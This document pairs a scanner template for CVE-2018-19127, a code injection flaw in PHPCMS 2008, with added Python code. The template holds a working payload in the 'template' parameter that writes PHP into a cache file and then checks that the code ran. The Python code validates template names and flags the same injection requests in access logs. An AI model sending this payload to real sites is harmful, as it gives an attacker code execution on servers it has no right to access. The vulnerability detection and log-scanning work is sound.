A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.
PoC code [published]
id: CVE-2018-19127
info:
  name: PHPCMS 2008 Remote Code Execution
  author: pa55w0rd
  severity: critical
  verified: false
  description: |-
    A code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.
  reference:
    - https://www.exploit-db.com/exploits/46234
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19127
  tags: cve,cve2018,phpcms,rce
  created: 2023/08/10
set:
  r: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss
    follow_redirects: true
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /data/cache_template/rss.tpl.php?1={{r}}
    follow_redirects: true
    expression: response.body.bcontains(bytes(md5(string(r))))
expression: r0() && r1()
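The description above states the whole mechanism: a request parameter named template becomes both the name of a file under data/cache_template/ and the body written after a "<?php function " prefix. The following Python is an added defender-side example, not part of the original advisory, the PoC template, or PHPCMS. It shows the identifier whitelist such a template loader should enforce on that parameter, and runs the same whitelist over web-server access-log lines to flag the two requests the PoC makes (the type.php call with a non-identifier template value, and the direct fetch of a .tpl.php cache file). The combined log format, the helper names and the log lines in SAMPLE_LOG are assumptions constructed for this example.

```python
"""Added defensive example for the CVE-2018-19127 pattern described above.

Not part of the original advisory, the PoC template, or PHPCMS. Two checks:

  1. is_safe_template_name(): the whitelist a template loader should apply
     before a request value reaches a cache filename or generated PHP.
  2. scan_access_log(): applies that whitelist to /type.php requests found
     in access-log lines and also flags direct requests for files in the
     template cache directory.

SAMPLE_LOG is constructed for this example (documentation-range IPs).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Identifier-like names only: no path separators, dots, braces, quotes or
# statement terminators, so a value can neither escape the cache directory
# nor close the "<?php function " stub it is written into.
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_]{1,64}")


def is_safe_template_name(value: str) -> bool:
    """True only for values that match the whitelist exactly."""
    return SAFE_TEMPLATE.fullmatch(value) is not None


# Apache/nginx combined log format (assumed); only the fields used are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

TYPE_PHP = "/type.php"
CACHE_DIR = "/data/cache_template/"


def template_param(target: str):
    """Return the percent-decoded `template` value of a /type.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(TYPE_PHP):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("template")
    return values[0] if values else None


def scan_access_log(lines):
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line; ignore it
        target = m.group("target")
        path = urlsplit(target).path
        tmpl = template_param(target)
        if tmpl is not None and not is_safe_template_name(tmpl):
            findings.append({
                "ip": m.group("ip"), "target": target,
                "reason": "type.php template value is not an identifier",
                "value": tmpl,
            })
        elif path.startswith(CACHE_DIR) and path.endswith(".tpl.php"):
            # Cache files are included by the application itself; a client
            # has no reason to request one directly.
            findings.append({
                "ip": m.group("ip"), "target": target,
                "reason": "direct request to template cache file",
                "value": path,
            })
    return findings


# Constructed sample: a benign type.php call, the injection request from the
# PoC above (its space percent-encoded as a client would send it), the
# follow-up fetch of the generated cache file, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2023:12:00:00 +0000] "GET /type.php?template=rss HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Aug/2023:12:00:01 +0000] "GET /type.php?template=tag_(){}%3b@unlink(file)%3becho%20md5($_GET[1])%3b{//../rss HTTP/1.1" 200 88',
    '198.51.100.7 - - [10/Aug/2023:12:00:02 +0000] "GET /data/cache_template/rss.tpl.php?1=900000001 HTTP/1.1" 200 32',
    '203.0.113.5 - - [10/Aug/2023:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ip"], finding["reason"], repr(finding["value"]))
```

The whitelist is the fix a loader needs regardless of how the parameter is later used: once the value can only be an identifier, it cannot name a file outside the cache directory and cannot terminate the generated function stub. The log scan decodes the query string exactly once, which matches how PHP itself decodes $_GET, so a double-encoded value is judged the same way the application would see it.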